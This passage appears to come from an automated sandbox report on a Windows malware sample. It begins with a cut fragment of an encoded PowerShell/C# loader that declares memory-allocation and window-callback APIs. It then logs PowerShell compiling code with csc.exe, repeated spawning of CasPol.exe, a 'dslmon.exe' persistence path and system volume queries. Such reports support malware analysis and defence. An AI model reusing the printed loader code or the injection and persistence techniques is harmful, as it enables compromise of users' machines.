kAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKABpAG4AdAAgAFMAbAB1AGQAcgBlAGMAaAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABWAEUAUgBTAEEATABFAFIATgAsAGkAbgB0ACAARgBvAHIAYgBpAHMAdAByAGkAbgAsAHIAZQBmACAASQBuAHQAMwAyACAAUwBsAHUAZAByAGUAYwBoACwAaQBuAHQAIABSAGUAZgByAG0AYQBuACwAaQBuAHQAIABTAGwAdQBkAHIAZQBjAGgANwApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUARgBpAGwAZQBBACgAcwB0AHIAaQBuAGcAIABNAG8AbgBzAHQAcgAsAHUAaQBuAHQAIABNAGUAbABsAGUAOAAsAGkAbgB0ACAATgBvAG4AcABlAHIAYwBlAHAALABpAG4AdAAgAFMAbAB1AGQAcgBlAGMAaAAwACwAaQBuAHQAIABIAEEAQgBBAE4ALABpAG4AdAAgAEIAQQBBAE4ALABpAG4AdAAgAE4AUgBJAE4ARwBTACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABSAGUAYQBkAEYAaQBsAGUAKABpAG4AdAAgAEYAbwByAGIAaQBzAHQAcgBpAG4AMAAsAHUAaQBuAHQAIABGAG8AcgBiAGkAcwB0AHIAaQBuADEALABJAG4AdABQAHQAcgAgAEYAbwByAGIAaQBzAHQAcgBpAG4AMgAsAHIAZQBmACAASQBuAHQAMwAyACAARgBvAHIAYgBpAHMAdAByAGkAbgAzACwAaQBuAHQAIABGAG8AcgBiAGkAcwB0AHIAaQBuADQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwBhAGwAbABXAGkAbgBkAG8AdwBQAHIAbwBjAFcAKABJAG4AdABQAHQAcgAgAEYAbwByAGIAaQBzAHQAcgBpAG4ANQAsAGkAbgB0ACAARgBvAHIAYgBpAHMAdAByAGkAbgA2ACwAaQBuAHQAIABGAG8AcgBiAGkAcwB0AHIAaQBuADcALABpAG4AdAAgAEYAbwByAGIAaQBzAHQAcgBpAG4AOAAsAGkAbgB0ACAARgBvAHIAYgBpAHMAdAByAGkAbgA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAGMAaQBzAHQAZQByAGMAaQAgAHAAdQBuAGsAdABlAHIAIABUAGUAbQB1ADQAIABQAEEAVABSAE8ATgBFAFMAIABIAGUAcwB0AGUAawAgAFUATgBSAEUARgBPACAAYgBlAGsAcgBhAG4AcwAgAFAAYQBtAHAAcgAgAEcAZQBuAGIAcgB1ACAAZABlAGMAZQByACAAQwByAGUAcwBjAGUAbgB0ACAAVABoAG
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3rumnuxb.cmdline
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\kar5iszo.cmdline
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESAD7.tmp" "c:\Users\user\AppData\Local\Temp\CSCB1B043D375E64A49ADE1599E795DF7E1.TMP"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA6F8.tmp" "c:\Users\user\AppData\Local\Temp\CSC12B2DF4544A1496EA7EB89E07B3D3FC6.TMP"
Source: CasPol.exe, 00000010.00000003.266621776048.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266617484991.00000000208F9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: CasPol.exe, 00000010.00000003.266950900619.00000000208C5000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266935141274.00000000208C5000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266881221623.00000000208C5000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266870205260.00000000208C5000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266956836020.00000000208C5000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266941779895.00000000208C5000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266962489115.00000000208C5000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266930219335.00000000208C5000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266937930378.00000000208C5000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266896916705.00000000208C5000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266877767612.00000000208C5000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266890949038.00000000208C5000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266902136828.00000000208C5000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266893081273.00000000208C5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Managerm32\cmd.exeing\11389406-0377-47ED-98C7-D564E683C6EB\DSL Monitor\dslmon.exe
Source: CasPol.exe, 00000010.00000003.266998257248.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266986587280.00000000208FA000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266819798320.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267090177582.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267092100473.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267381718592.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266791092513.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267166482776.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266809270757.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266798896933.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267003703455.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267284704845.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267405005178.00000000208F4000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266803817005.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266837130450.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267386131376.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266815636769.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267296199956.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267010333985.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266822361681.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267303192324.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266814096224.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267299000810.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267081739212.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267132189535.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266991101692.00000000208FA000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266833230991.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266835254253.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267075538002.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267134553631.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266996130718.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267122511378.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267162084985.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267031293588.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267176767839.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267008195889.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267482584167.00000000208F4000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267159374349.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266789023399.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266970735507.00000000208FA000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267172132004.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267378195452.00000000208F9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerAppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB\DSL Monitor\dslmon.exe
Source: CasPol.exe, 00000010.00000003.266998257248.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266904811077.00000000208D4000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266986587280.00000000208FA000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267090177582.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267092100473.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267381718592.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266791092513.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267166482776.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267396598244.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267039466145.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267034179578.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266796450678.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267093672541.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266798896933.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266720174861.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267003703455.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267066755846.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267036338977.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267386131376.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267293066249.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267303192324.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267142396446.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266682544408.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267096212102.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267042082868.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267075538002.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267134553631.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266976192586.00000000208FA000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266996130718.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267122511378.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267162084985.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267031293588.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267176767839.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267008195889.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267069401168.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266842181155.00000000208D4000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267159374349.00000000208F9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266983611905.00000000208FA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Managerm32\cmd.exe

Language, Device and Operating System Detection
barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
